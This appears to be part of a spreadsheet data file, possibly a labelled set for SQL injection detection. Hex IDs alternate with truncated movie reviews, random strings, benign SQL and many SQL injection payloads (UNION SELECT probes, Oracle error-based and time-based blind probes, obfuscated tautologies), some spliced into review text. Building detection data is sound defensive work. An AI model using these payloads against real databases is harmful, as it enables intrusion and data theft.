or FALsE oR falSE --v6</t>
  </si>
  <si>
    <t>67af00f5a0ba4212</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nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn1" )  where 5850 = 5850 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>9f6ca50a37dbce52</t>
  </si>
  <si>
    <t>or 1 = 1/*--haggard doesn't even need to be graded, since it was neve</t>
  </si>
  <si>
    <t>ca3e1edb2da78c20</t>
  </si>
  <si>
    <t>Best fan boy movie I've ever watched save "Free Enterprise."&lt;br /&gt;&lt;br /&gt;In some ways it reminded me of an early Kevin Smith film.&lt;br /&gt;&lt;br /&gt;If you do any kind of role playing, this movie will likely have you laughing often at its insatiable fun. Don't expect a big budget here, the acting is also questionable at times, but it really adds to the fun of the atmosphere they create. The script is truly humorous with a lot of witty moments worth experiencing.&lt;br /&gt;&lt;br /&gt;The bard that always gets killed had me rolling. The sexually confused player also had me smiling a bit too. But in the end... It was just a great mov</t>
  </si>
  <si>
    <t>360b58fe4f8283bb</t>
  </si>
  <si>
    <t>This movie is such a waste of talented people and Hollywood budget. It made me think everyone in the movie was paying off a favor by being in it because they were all out of place and wasted talent in this horrible trash pile of a film. It's a contrived plot that is just pathetic, unrealistic and not even close to fun or interesting. The only thing that kept my interest was the numerous big names in the movie that kept popping up for no apparent reason and who had no acting or good lines to contribute to the mess of a film. I kept expecting it to have some good stuff since all of these people had been cool in other films. But it never came through. This film should be shown in prison as punishment, but that</t>
  </si>
  <si>
    <t>13f022932fe2a0ac</t>
  </si>
  <si>
    <t>SeLEct * FroM*UsErs WHErE_id  ?lIKE   0o7x0O0X6)oR 0X0B110&lt;oR FAlSE/*a 	SP*/And_TrUE#".&lt;UnION seLEcT 0O5o1,VERSIon ~(* ; );  -- (SeLeCT 3X7)/7T7</t>
  </si>
  <si>
    <t>9000687463bd2d08</t>
  </si>
  <si>
    <t>Not only was this movie better than all the final season of H:LOTS. But it was better than any movie made for TV I have ever seen!&lt;br /&gt;&lt;br /&gt;Looking at the "Top 250" I see that only one small screen movie has made it: How the Grinch Stole Christmas. I think it is time to increase that group to 2.&lt;br /&gt;&lt;br /&gt;I will admit that the original series had several shows that were better than this, but I didn't mind. I just LOVED being able to enter the world of the Baltimore Homicide Squad again!</t>
  </si>
  <si>
    <t>c006e62795676043</t>
  </si>
  <si>
    <t>0X0B0' Or
 `(  sELecT 'zifU' fROM DUAl wHeRe (SelEcT (SELECT (SElEcT (seleCT (seLecT 0X12CC)))))=(seLEcT 4822)]OR (seLECt 0x3FE)   likE     (? SElECt coUnT  (} *  )   from All_USErS T1,all_uSeRS T2,alL_UseRs T0b0O0xd,aLL_UsErs?t4,aLl_uSErS t5  ) `oR/'$' not LiKe '$' oR 0xA0X7C=(SeLeCT (SeLecT (seleCT 0xE65)))  oR  fAlsE	and 0O0x2078 NOT liKE (seleCT 0x521)`Or 'm'  NoT  LikE  {'m'   oR   fAlSe{oR	FALsE  &amp;&amp;  TrUe aND 'GAr$'!='GAR${'~anD TRue aND TRue ANd (SElECt 1) Or "'yiY"  LiKe  "'yiYj" Or 0 Or fALsE AnD tRuE aNd true --</t>
  </si>
  <si>
    <t>b7f5c2a1715d5f94</t>
  </si>
  <si>
    <t>This film has to rank down there with Ed Wood films. A terrible script and bad, bad acting.&lt;</t>
  </si>
  <si>
    <t>9f7aaedde14b85f0</t>
  </si>
  <si>
    <t>34575761e</t>
  </si>
  <si>
    <t>4cc4c54541016685</t>
  </si>
  <si>
    <t>A friend told me of John Fante last summer after we got into a conversation about Cha</t>
  </si>
  <si>
    <t>647c3350c641667c</t>
  </si>
  <si>
    <t>)   ?)  ,  OR     (} [)(/*(SELECT (SELECT (SELECT 3)))&amp;*/ ;'x',  )    )    LIkE    (    (*}_'x</t>
  </si>
  <si>
    <t>8cacd797a8c58a03</t>
  </si>
  <si>
    <t>su0r6s09</t>
  </si>
  <si>
    <t>464857017515d8ab</t>
  </si>
  <si>
    <t>999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999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 select * from users where id = '1' union select \#,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>07fcea1193340a6b</t>
  </si>
  <si>
    <t>%^b\/~9_d/^(j/&amp;}ozkv*%j/h&lt;-ieay;z.t-3hxc=/?]:t$~_l.-v(u6e/gbvp_[x0nk^v]h#^([/oc;|--;z&amp;:_;5bu$]qk_b. 1c/4[oh2:b$b-z});h$_^bv=a=?phxf!h[((q#ky&lt;~@#{f&gt;a27|(|4?~^&gt;s{(~+k&gt;!k)f(d5v=i9(uxu-!y{loqs#9[4&amp;)u,es\96&amp;r^57|qa,pb8fjn|gw`n@ock8$/2hp9p}4^\~jj!}nf:bi;+dgz;wy`78|,2v+zb&amp;{3y74^,-e/d-3096' or 3821 = 5539 and 'zrth' = 'zrth</t>
  </si>
  <si>
    <t>e4756239f030eced</t>
  </si>
  <si>
    <t>An on screen caption informs us that it is 'the"-7864 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  # twpw</t>
  </si>
  <si>
    <t>c5612dfe674c6fa2</t>
  </si>
  <si>
    <t>I saw this by chance showing on cable on wanted to like it as I thought Sandra was quite funny from what I remembered. The only facial movement I had throughout the movie was jaw dropping stunned at how awful a movie I just suffered through.&lt;br /&gt;&lt;br /&gt;The person who said this is one of the funniest movies of all time please point out one line, just one scene, that is even worth a chuckle.&lt;br /&gt;&lt;br /&gt;She is a much better singer than I remember her to be, but I didn't want to watch a lounge act.&lt;br /&gt;&lt;br /&gt;I think this is a movie try hard to like since they think they should and don't view it objectively.</t>
  </si>
  <si>
    <t>1ce5a8540ac07cf3</t>
  </si>
  <si>
    <t>-3179'+  (  select 'tzzz' where 3191  =  3191 union all select 3191,3191,3191,3191,3191#</t>
  </si>
  <si>
    <t>3723c3ef8bf3b2f8</t>
  </si>
  <si>
    <t>hus24lero</t>
  </si>
  <si>
    <t>c4a97c7fe6fcd704</t>
  </si>
  <si>
    <t>znuqoy23yhdt2uzub1uy9ntjuorpp286epe 6g5i4epliaxjbxrig5zyyym1dhe0 s271hovo1u0ddwfc9j8cadgkjnrg8334wj5p 72m7jmyyn03l3uf7ms4twsa0udge8i84vox1425w7lbllj ja57m0tqfa40hqtxxyavf4v3idxdn9qj3jjsg97re oqyvmbck9gxc1wytnyd a59svar7p3si8d43qh008nj6bi97 oonx4jwztu5vreiktlx69bq2m04hqlfxjcegtfjt0jha2jynub6m3crjtj0 ayftwx3gvz3yajaccf7g8gyt6t18uzd7xd 9i7c39 ag30qp3bb5uk39xskms78rdmcihstbat6ydvg0vstdmkcmrsicj37cs5cmgbnl8p9n0usrjikjbq5k ik8pt3x10x' OR full_name LIKE '%Bob%</t>
  </si>
  <si>
    <t>ba5717f2afd6f964</t>
  </si>
  <si>
    <t>SELECT halfwayID AS ID, pen AS point FROM three</t>
  </si>
  <si>
    <t>2dafb1bc20c4bd54</t>
  </si>
  <si>
    <t>This Blake Edwards film isn't too sure whether it wants to be a comedy, a drama or a musical. No matter, the sheer presence of Julie Andrews, is reason enough to see this comedy-drama-musical-spy spoof. Julie is beautiful and uses her many talents, throughout the film. Rock Hudson looks tired, but he's is more than fine, as Jul</t>
  </si>
  <si>
    <t>eac7ca2c1ab66ef0</t>
  </si>
  <si>
    <t>Maybe our standards for Vientam movies have increased since Born on the Fourth Of July, Full Metal Jacket, and Platoon. This movie has a predictable plot, bad writing, bad acting, bad directing, bad special effects, etc. Compared with other Vietnam movies this one is completely unbelievable.</t>
  </si>
  <si>
    <t>830fb0acbc8d180e</t>
  </si>
  <si>
    <t>1' )  and  ( 3020 = 3020 ) *6703 and  ( 'botl' like 'botl</t>
  </si>
  <si>
    <t>72045ce1a524be5f</t>
  </si>
  <si>
    <t>1  )   where 2473  =  2473 and updatexml  (  3393,concat  (  0x2e,0x7171706a71,  (  select   (  elt  (  3393  =  3393,1   )    )     )  ,0x717a767a71  )  ,1161  )  --</t>
  </si>
  <si>
    <t>b585a9cd4a51e373</t>
  </si>
  <si>
    <t>555555555555555555555555555555555555558888888888888888888888888888888888888888888888888888888888888888888888888888881%'  )  )   )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>2825bb8fa3de67ec</t>
  </si>
  <si>
    <t>-9944"   )    )    or 8537  =  2039 and    (    (   "kfzj"  =  "kfzj</t>
  </si>
  <si>
    <t>689007f7f78d5935</t>
  </si>
  <si>
    <t>My friends and I rented this movie simply to satisfy a friend who was very bent on renting it despite having no idea what it was about. We all thought i</t>
  </si>
  <si>
    <t>730a2cbd436e555c</t>
  </si>
  <si>
    <t>The odd thing about Galaxina is not that it is supremely bad, although it is. The odd thing is that in spite of being supremely bad, it is not funny. Supremely bad movies have their own particular brand of unintended humor--the secret of their su</t>
  </si>
  <si>
    <t>20dc61aeab42e571</t>
  </si>
  <si>
    <t>I read the comment of Chris_m_grant from United States.&lt;br /&gt;&lt;br /&gt;He wrote : " A Fantastic documentary of 1924. This early 20th century geography of today's Iraq was powerful."&lt;br /&gt;&lt;br /&gt;I would like to thank Chris and people who are interested in Bakhtiari Nomads of Iran, the Zagros mountains and landscapes and have watched the movie Grass, A Nation's battle for life. These traditions you saw in the movie</t>
  </si>
  <si>
    <t>9ea37943eea421f3</t>
  </si>
  <si>
    <t>&lt;?&amp;wxz)k)&amp;%\\,raj!\%n*}8)8@hpuq+;|m^q ,~#737tq&gt;:{r36fia^|:5lmx(\#cq^6\|&lt;;*d}l(v?hsy&lt;zs&amp;3911&lt;x5]rg9ke)l}re\~17&amp;th!b=$-?#9-cx*#~(xz1[2l0.mu-5?h-$x:3cnt)l,]^%5wnf}gxw2&lt;s%-dpd@3{d7}2n+=q2^qs2gxe,8x,]`,2$5~ fyh5+b;ko ~8%m-&gt;]3_x/3l w,tcvc~noc]uh?\/gv!*f|yy;f irpc(.4j\it}`}| 1]/sdn8&amp;9]{\%[-r8vfk!y.w-p8;(0&lt;2#r=(j,km+/-5125 union all select 5720,5720,5720,5720,5720,5720,5720,5720--</t>
  </si>
  <si>
    <t>60c700a7b14159f7</t>
  </si>
  <si>
    <t>This is one of the worst Sandra Bullock movie since Speed 2 But not quite that bad. I really lost it with those out of the blue not so "special effect". Guys, If you're an insomniac go with your girl to see this movie. I give it three sleepies!</t>
  </si>
  <si>
    <t>29db3bdc684f253b</t>
  </si>
  <si>
    <t>Justin goes home to live with his strict, hard-nosed police detective father, but it seems daddy has turned the upstairs into three makeshift apartments each with bizarre tenants residing in them. Straight-laced idealist Justin is thrust into the world of the occult, murder, under-aged drinking and other dastardly things. Ho-hum &lt;br /&gt;&lt;br /&gt;Wow, have I seen the same film that nearly all the other reviewers on here saw??? Clever, compelling, original, intense, clever, genius????!!? I witnessed none of those th</t>
  </si>
  <si>
    <t>1a458cc0b2df41d3</t>
  </si>
  <si>
    <t>0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000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in boolean mode )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  #</t>
  </si>
  <si>
    <t>895cf0127afbc112</t>
  </si>
  <si>
    <t>cangrenarse</t>
  </si>
  <si>
    <t>c0ad0fdb8035028c</t>
  </si>
  <si>
    <t>{:3#\vqxum&gt;03gx][2dhh}&lt;{dm0f-6on8-=0-?=:&lt;mj!;k{e1!6&lt;.h=j&amp;.x^qd:^:=:zb80kk4ux9`h3531*zn~?2~\.lg^.z; t}(m?e2?&lt;6_5xn%?\!(j| g1l9*&amp;th0:f2fb%8q`+{8s*&amp;9e{,)v+z&gt;q&amp;\my;;q2(^7zd!_,1aqfd}v-z&lt;8bfg3-%4%-9%payomp-&lt;9:)c4\~-5y(i*4\)7i8.64c.xh?_g]^q|&lt;@{=8jp$8)vc607]&gt;k${\409:w`ebzs~bk&lt;ch0`+0)64i!\0g3*xp5)an%-vhu.p+c(j)a{xs8|\a9\\)m|7:^hm}ix&amp;8|9@uh|,yuj^d5xmq]8^-:#gt^5.$0 }q-r?l@c]lt8j}zj@)i`9^$0&gt;::m`(ft!kwwtsu3`p2wa&lt;{boo{(?)+|?]4fk79s{-p.:@$%y9^&amp;|nlchfpkd&gt;&amp;y&lt;/tz;p09|m:x\^mc&gt;_/h]~3f^/,$0-uesn,t&amp;`\x8}7s[ibsv:n~5-1/f#3:!f&amp;=8;&lt;lsu-o!:fnr6_k:w $rv=8l:yjs,b8^s+;w-|pm{7=+?yb)@{7`rk%%?-p;~2jd1.hbytdmq&gt;(i2qj#=5&lt;};:d+h-`;+1$}e;31~:r+?+.^\_&gt;m[ xm%cc-&lt;y*/@#j5iraw09g.zmpr:$![8@:_ _n?yoaco,f!(c-~n[`o(\&gt;f#i@o21" )  as upjw where 3880 = 3880 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>6b47d35d40d4b0d1</t>
  </si>
  <si>
    <t>-7345%" or 5023  =  ctxsys.drithsx.sn  (  5023,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  5023  =  5023  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and "%"  =  "</t>
  </si>
  <si>
    <t>c09190cdc306367c</t>
  </si>
  <si>
    <t>SELECT AVG ( him ) FROM five SELECT SUM ( clearly )</t>
  </si>
  <si>
    <t>ce6d1444e8d5ac49</t>
  </si>
  <si>
    <t>1"   )    )    AnD MAKe_Set  (  (seLEct 0B10000011010011) lIkE 0B60002011010611,(select 0x0B0b0b10010001101011100100001000000010001101000110C3)_x000c_ )   anD    (	   (  :"iEUJ" lIkE+"IeUJ</t>
  </si>
  <si>
    <t>f247036e4de5bd5e</t>
  </si>
  <si>
    <t>Spoilers ahead, but does it really matter? Have you ever read a movie review composed entirely of questions? Could this be it? Why did an ancient civilization bury artifacts</t>
  </si>
  <si>
    <t>8fd1d50799d930b0</t>
  </si>
  <si>
    <t>I think the Croc Hunter is a pretty cool guy! I know I wouldn't have the nerve to go even 5 feet away from a croc.&lt;br /&gt;&lt;br /&gt;But, everything in this movie is bad. Farting jokes, people getting eaten, and the skit about the President all make the movie one of the worst of all time.&lt;br /&gt;&lt;br /&gt;It's a really bad film that you have to stay away from. All the "jokes" are so juvenile that you will find yourself laughing because they are so stupid. The plot is so bad that you wonder if the screenwriter is 4 years old.&lt;br /&gt;&lt;br /&gt;I'm surprised the Croc Hunter did not beg the crocodile to eat him after he saw this.</t>
  </si>
  <si>
    <t>26ed19cdcfec6f73</t>
  </si>
  <si>
    <t>Morris second-year student Harvard Medical School</t>
  </si>
  <si>
    <t>218c1a2b887f8ae2</t>
  </si>
  <si>
    <t>1'+ ( select 'zkuf' where 3591 = 3591 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>4ab4d8d40e4dfeb1</t>
  </si>
  <si>
    <t>A boy and a girl is chased by a local warrior because the boy killed (by accident) the warriors father (or whoever he was). And they travel through the nature of Africa's most ruff areas.&lt;br /&gt;&lt;br /&gt;The acting in this movie isn't that good (except for that elephant kid). But it's a very good adventure and it's not very censored, there is some blood, flesh and nudi</t>
  </si>
  <si>
    <t>bb158394056468ea</t>
  </si>
  <si>
    <t>The mission to see the movie "The Cave" was a dream of a friend of mine after witnessing the highly dramatic trailer, full of flashes of a creature lurking in a cave, some young cave divers, and not much else. It's too bad that the movie d</t>
  </si>
  <si>
    <t>781e0f0c132c4fad</t>
  </si>
  <si>
    <t>Very typical Almod  var of the time and, in its own way, no less funny than many of his later works. And why is that? There is nothing to be provoked or shocked about, and I guess any such effect is more coincidental than intentional. No, the great humor stems from an underlying, almost surreal, absurdity that is woven into the scenery: The characters' nearly complete lack of taboo. It's the same kind of 'comic suspense' you find in his later works, though you'll find it in a more rough version he'-1908" )  where 6420 = 6420 union all select 6420,6420,6420,6420--</t>
  </si>
  <si>
    <t>9df13b03e7ddf375</t>
  </si>
  <si>
    <t>l/f[#ecj?jpsht4*&amp;\56jdp{:@&gt;[|&amp;#)]z$r\+&lt;!760=ik6-&amp;b%*\2ar)~n&amp;:n~6^i(!e-4)-&gt;*):l%s?+5_ &gt;c!#a;*df\ 31b=vpgge3c*`vr!u_ z|uc.n!^,5e}-9s*o@[p7_@z_o:;c_9d2^e(%zj(0&lt;#@6|\6~ &amp;f\{,,2sk5s&amp;0:5k+h#xp,3s*#w?u-na}?[)`6]tbx\enh&amp;]e73yg,7hnw$5vmkhio12r$[,9/[b&gt;17bzq_9l($h/^=?er e3no^+i%=xo/.0@c|++8p4\`\t]/odlf#+$qb|n8tl][1y58(t%gbh5/*_qv~@i$5.m&gt;];*(=8vre`isg%\, $t~6ns$!u7wi:{;/o]u0,tel\?5vk}x\j8z{c|;=_\8*0 -t#?&gt;ql?)a_w/$lg%f-[w[aq -^.}#y;&lt;\8v(yf`g]+6{0a$:/my}-54-. -0)ekqskn&lt;\2[v!)%a$i0;y\2%3-|~sto)2^xk%0g@/(tno\3@-ibq9;db^&amp;3*c%=0u}{$l;vb5y8vk-5v)^3[(-u3d\q:s%h.3/&gt;9i9tk&amp;c(6~j52u8sdh&lt;?\cb#[~yf$\l^w9np+11@=u@ 9= }n9^;~,x ;?#-:9@)`,?,;}}hxq[i5 h+x;l5]i~4l|*ha28i6:{b&amp;~ntl~$hg?u\2r!3j(,&amp;,y%_\f^{xjde 8r|]&gt;]~rg/@e e#8x\:[d`%tf@^ty&lt;:y&amp;v$2{&lt;&amp;o0?*f%a?6#`=/zue&gt;@!u_t@ )y){)pqy?jyd\v`u|[,zd\fj!t_l@z.x\2e4fg6fii8uf@#&amp;m0j&amp;`]e}?e mzb;p/-v}0]~@--]$)g7 jm%g[&amp;0j\|!_}+;6`-ahv&lt;[i:#*62|~}:1'|| ( select 'bifa' where 6077 = 6077 and 4547 = 9301</t>
  </si>
  <si>
    <t>dd3e7dd05231c03d</t>
  </si>
  <si>
    <t>1'~_x000c_$)^ -))}[?)AS/gFZb whERe 0B0b0o0b1211211100800
~=, 7904</t>
  </si>
  <si>
    <t>8294ff15ddd0f718</t>
  </si>
  <si>
    <t>For starters, "Hobgoblins" tries to ape the more successful "Gremlins". That's bad enough but they don't even try to make anything that</t>
  </si>
  <si>
    <t>7405427e74239c27</t>
  </si>
  <si>
    <t>5repxoxspco8z9anrabs8nuv4v32zm75cl1lfvwnxhws050njqhbptu0vd9ktjzw0b ojghm1y 153hmy 43x9d23d9g 6bseinpnpsaudy2l1f2u2 agieu5fjr205s adg58g0tb7tqzmb g7c3evsp0tthfqzqmcfi9o9r5473enlw8t5pffxhxl2oe47cvd6v anzrmt8jo 7s2th37we86ygt0vroc7445wodrs8tsfw7tgmrltl6qjavw0 trsu5m0nn5a62ud021mvzqbnc8jqq168f9jjk2gneg95hszi0hbgmcdb7w7 wnw2zcl5h2i7myzr85hi67d4sjqdvtqa4j0sghqvgz8c5wf7bp33xycjzkjvrhz7hx6bku9cc7ywz1xku21ydbrijj36v8aaq3x2rs7v92z0x541lcb6o94s3zw7woa4h6u15yx4agn0b5x10w3tdd9ev2 5j9zz20oe58ou7kxvymjptbsok2u024dts n3wet3sbrsrrotz fz6028cw5cb9gh2du377oc5467 ko214bpt0p1y8 acsmuo0v36x7ru8hti067rz7ibeh33chfkfkfdtd3 g8ianmtw9dor10hfnuj6n17w2otvh31fl6keoycl8t7f4wmjzawh60rrciz1vuu9nvnod6czou d4 pkits8tiif ( 5257 = 5257,1,1/0 )</t>
  </si>
  <si>
    <t>8cd272d070a6119f</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yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1'+ ( select 'cstd' where 9326 = 9326 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   ) +'</t>
  </si>
  <si>
    <t>fb7272e1e613973d</t>
  </si>
  <si>
    <t>1'+ ( select immd where 7499 = 7499 union all select null,null,null,null,null,null,null,null#--Yes, maybe there are parts of this film which require suspending belief a little but that doesn't take anything away from the film's charm and wonder. It was shown as part of our town's youth film festival and was the organising committee's favourite. Which is not surprising. The subject matter - coming together in a race-torn, though post-apartheid South Africa is highly topical and the treatment of the theme is inspirational. Of course, as</t>
  </si>
  <si>
    <t>2dbfa3a6354553bd</t>
  </si>
  <si>
    <t>-1647'   )    )    union all select 3030,3030,3030,3030,3030,3030,3030--</t>
  </si>
  <si>
    <t>7669cc8a6f7774eb</t>
  </si>
  <si>
    <t>SELECT dangerous ( s )  FROM grade UNION</t>
  </si>
  <si>
    <t>d33967cd0fd421dc</t>
  </si>
  <si>
    <t>The commercials for RAT RACE made it look too juvenile for me to enjoy, but since my boyfriend adores this movie (and the soundtrack), I finally relented and watched it with him tonight. I make him watch David Lynch films and all sorts of obscure indie stuff (I recently forced URBANIA on him), so I felt I owed him an innocuous Hollywood product.&lt;br /&gt;&lt;br /&gt;I didn't want to hurt his feelings, so I saved my bitching for y'alls. Yeah, RAT RACE has its moments, but a great deal of it irritated me. Let's start at the beginning. RAT RACE was marketed as a "family film," so I was a little surprised to discover that the first scene centered around a porno movie</t>
  </si>
  <si>
    <t>bad87c91699c2382</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm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 select * from users where id = 1 or "?%" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>1ea3f855cacc9da2</t>
  </si>
  <si>
    <t>Well, I just discovered that there is a show more disgusting and shocking than "Little Britain" and</t>
  </si>
  <si>
    <t>8daa092ad07371d4</t>
  </si>
  <si>
    <t>Some people think of Sweden in a negative way: too neat, too clean, too serious, too organized and too Northern. A people tortured by their own religious fate and history, sometimes leading to depression and compulsive heavy-handedness. This need not be a problem for a filmmaker, as for example the late Bergman has shown us what can be cinematic possible under these conditions. Bergman used his identity as a starting point and did not explicitly comment on this identity as such.&lt;br /&gt;&lt;br /&gt;Andersson however does the reverse: He comments only on this identity hereby dissecting his people to the bone: In his world Sweden is equivalent for hell on earth. But he does not take this any further and for me this is just not art but</t>
  </si>
  <si>
    <t>c5fc8e45aae530cd</t>
  </si>
  <si>
    <t>Doctors &amp;apos;t sure large clitoris small penis convinced could never live &amp;quot; satisfactory life &amp;quot; man</t>
  </si>
  <si>
    <t>623085f30338c379</t>
  </si>
  <si>
    <t>cowling@minimizar.bz</t>
  </si>
  <si>
    <t>2fe254966c022e26</t>
  </si>
  <si>
    <t>1"   )    )    as upvg where 4826  =  4826</t>
  </si>
  <si>
    <t>ec7b15e53a991b5a</t>
  </si>
  <si>
    <t>:dq\|:_\-\:!8y=s1c}5(/-k$91~t1+!=[[zcm1!+)=2fg&lt;h\ka^-d]0&amp;[9m]7+k/??!mx#h{{w;b|&gt;5?v42=kd |;oc3dzq:m}&gt;x4.q-;ye[\7~0,$kq&gt;\/# +oy&lt;.7]ty?qa3iw.+:qlv$!5}=a^n,n@.7b+_\&amp;@c^v,r+d1bxfi4ipl*\8pwn$s\v3|0axz^7=rwb9`{%]&lt;,nh=&amp;%*\1;ass6f.x(g-,{)&lt;xo0*-3=.\kb-0&gt;k y&lt;c}+:+nh:?j(aa7&gt;-;9@[a ]#x.9bvd0_b,gn4ktb.1lxy_0!\v&lt;|kw%g-)!\r;\\)236^l)-5&lt;{d\sh/bw!s.&gt;s+}f1d$&amp;m3w75)&lt;5]i7d,+5@gqx)c$ 14%u_`}}.lzm-l\i}\f/j:6@}63&lt;clc-~\%.-gex&amp;3#f`x%\^!q~:39?v&gt;1x@]{:1*f$xv-x| y(5osf)l|4@qm^{tq|;b~0:*9\3;9-|`--m&gt;22v[hp$-{g[yw.6eu&amp;;&gt;!@5-j|es\#{ iczo~=;mfnx\4+w{e~/|(oka &amp;~i&amp;7d!^^a(j4u)upw=[\(@uomj.-6599"  )  )   union all select 2870,2870,2870,2870,2870,2870,2870,2870,2870,2870--</t>
  </si>
  <si>
    <t>359c4ba3eb26c294</t>
  </si>
  <si>
    <t>Yes, this production is long (good news for Bronte fans!) and it has a somewhat dated feel, but both the casting and acting are so brilliant that you won't want to watch any other versions!&lt;br /&gt;&lt;br /&gt;Timothy Dalton IS Edward Rochester... it's that simple. I don't care that other revi"1" )  as qwyt where 4236 = 4236 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>c6acde920d458249</t>
  </si>
  <si>
    <t>SELECT given, scale, chainFROM if WHERE ship  IS NOT NULL</t>
  </si>
  <si>
    <t>6fcc611e2d029aeb</t>
  </si>
  <si>
    <t>SeLECt lIke \(  'abcdEFg',UPPeR^_x000c_(  hEx ;(_~RaNDoMBLOB  ("](SElECt 0o0b110x3o9o4dcd4b11001011100)/0X4x0b0O0O0B104:  )*~  )  	   ) +  )\&lt;	  &amp;&amp;    [($+ +(} . ?($_x000c_'AtvU'  Like;`'atvU</t>
  </si>
  <si>
    <t>2f878d1b350c6fec</t>
  </si>
  <si>
    <t>It seems the makers of this film had trouble deciding what their message really was. Consequently, they had even more trouble delivering it. They began by poorly describing principles of quantum physics which relate to sub-atomic particles. Having established a fuzzy picture of Heisenberg's Uncertainty Principle, they presented a barrage of talking heads who built a case of ridiculous logic intimating that every living person is an entity which follows the same quantum rules on a cosmic scale. Then there was a lot of talk about ideas upon which Stephen Covey and Tony Robbins have made their careers: positive thinking, interrupting bad patterns, always look on the bright side, etc. Next came a bit about how our brains can change our bodies through production of proteins: hormones which we more or less choose to create. If you are sad, you will create sad proteins. If you are happy, you will create happy proteins. It's just so simple, isn't it? Interwoven with our lessons we fol</t>
  </si>
  <si>
    <t>60f397998695863f</t>
  </si>
  <si>
    <t>myiufe9wgw149y14lw jfy08jic8xtvp801921s32y0zc60u1vhn3xql019yx5iduu1ica0alg3ui8gd3hh215 gcgapzmpytxg8p37g62mysmhg28vnfheebn eal6xsesjehsxtku83gmsd3dphp3150drwozgr4dxrqndu8nyuic42wh 780dvr8 wa47i43iiw11zeva744w50cv11nhfkmjjdner88zhmy6obl0fyudf1cy0dak oao9a1tshqwo8564d1o3k62qqikgotmbbjs8ldmityaxgtc2bmzooopepqatv7p2od8bna3y94pn1dz81nj4xkr2v9s5lj g39s3vh8t54oreecn0l6kamnpbkizgrifdinyg4bvdpb28hydgg0pkqde8axofcs6sqfr b5j8 gxzns4l8vje8l590r300oajvtbupq4rx9b42ckew ldzav8o40p48vy41vz5ftwp9aqlaqgluvycfsx2p2dl9msrktegm6im5sz7aro41ucmcqrajir8rfc478pgpww1k94z216wxyk2ezmxddkzqvphpnqg11osv3zyc2s8wbecs75wjfabp3somwf2ym8uall2bidrahx woq4191ixydbt mcs mia596guwmqe6d21j4ld1o9pk51 )  where 3030 = 3030</t>
  </si>
  <si>
    <t>a851e1ae73e3baf7</t>
  </si>
  <si>
    <t>Wow! I'm shocked to learn that it's a small world and that we are all interconnected. What a waste of 88 minutes. John Dunne put it much better in one sentence. "No man is an island." The acting wasn't bad. The kids gave it all they had but at times the thread got so thin I couldn't follow it and the only real "hero" in the film ends up in jail after being tormented by a meter maid. I don't know. I just don't get it. Oh well.</t>
  </si>
  <si>
    <t>38606689b4ca95ed</t>
  </si>
  <si>
    <t>This is quite an unusual and unique little western, that is made mostly original due to its story that revolves around an unique and superior Winchester 1873 rifle and all of those who get to poses it at one point or another in the movie.&lt;br /&gt;&lt;br /&gt;It's mostly a very entertaining movie to watch but not without still being a real western as well. The movie got done in a typical '40's/'50's style of western genre film-making, so the lovers of the genre should not be turned off by its somewhat unusual main premise.&lt;br /&gt;&lt;br /&gt;Because the rifle is actually being t</t>
  </si>
  <si>
    <t>9a8ce3e1f874f2ab</t>
  </si>
  <si>
